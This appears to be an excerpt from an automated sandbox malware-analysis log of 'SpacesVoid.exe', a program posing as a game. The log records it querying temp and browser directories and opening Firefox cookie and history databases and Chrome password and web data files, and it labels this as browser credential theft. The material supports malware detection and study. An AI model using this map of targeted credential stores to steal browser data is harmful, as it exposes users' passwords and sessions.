Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\all-files-FUK7Ic VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\all-files-FUK7Ic VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\all-files-FUK7Ic VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\all-files.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\.ses VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\.ses VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0196354653 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0450125302 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0450125302 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0518291756 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0518291756 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0653671941 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0653671941 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1141274626 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1141274626 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1237160943 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2160417493 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2160417493 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2265332024 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2265332024 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2385760553 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2585558601 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3024948866 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3050907755 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3476888679 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4054640694 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4054640694 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4683256203 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4683256203 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5064077962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5713452101 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6092905029 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6483516391 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\7155756679 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\7216804956 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\7245361316 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8492240360 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8552718761 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8784112376 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\9925478147 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\Acrobat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\Acrobat\DC VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2023-10-05 08-46-02-125.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2023-10-05 08-46-02-125.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2023-10-05 08-46-25-059.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2023-10-05 08-46-25-059.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrocef_low VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\AdobeARM.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Diagnostics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487428721656700_8183D06E-095C-4C4A-A883-18B083FDA30C.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487428721656700_8183D06E-095C-4C4A-A883-18B083FDA30C.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487456555183400_C3B2669B-4862-44CB-BCC1-701EAE43EADE.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487468317710800_4F261BAB-FD08-4743-B9C8-E1FB294AE265.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487468318250000_4F261BAB-FD08-4743-B9C8-E1FB294AE265.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696487468318250000_4F261BAB-FD08-4743-B9C8-E1FB294AE265.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1012409649\e8d11bd0-b939-446e-b741-2c68ed471a53 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1012409649\e8d11bd0-b939-446e-b741-2c68ed471a53 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1077836906 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1077836906\376d5b20-4ccf-4ab3-92ec-d2fa66fb039b VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1567651471\7f41fcdb-a3ef-47d4-86cb-0f3555d3db82 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_17058258 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_17058258\ef5f792e-9df7-4748-accf-02ec33a4a2c4 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_17058258\ef5f792e-9df7-4748-accf-02ec33a4a2c4 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1725894609 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1725894609 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1725894609\e9f8c500-8e5e-4ddd-9bef-4e0b522248e9 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1725894609\e9f8c500-8e5e-4ddd-9bef-4e0b522248e9 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1740856358 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1763153001 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1763153001\5686322a-ffa9-43cd-98c7-9900dceae2d0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1763153001\5686322a-ffa9-43cd-98c7-9900dceae2d0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1779658456 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1779658456 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1779658456\873489b1-33b2-480a-baa2-641b9e09edcd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1779658456\873489b1-33b2-480a-baa2-641b9e09edcd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1798580215 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\edge_BITS_5464_1798580215 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0824.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Low VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5156_110794397 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5156_110794397\78549187-a875-4f1e-8dfa-9938ebc29c81 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5156_110794397\78549187-a875-4f1e-8dfa-9938ebc29c81 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5652_1417691134 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5652_1417691134\78549187-a875-4f1e-8dfa-9938ebc29c81 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5652_1417691134\78549187-a875-4f1e-8dfa-9938ebc29c81 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\nuw8h1nxpxc6 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\nuw8h1nxpxc6 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\nuw8h1nxpxc6\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\nuw8h1nxpxc6\Cookies\Chrome.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\nuw8h1nxpxc6\Cookies\Chrome.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\offline VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols\pingme.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\wct1CF4.tmp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
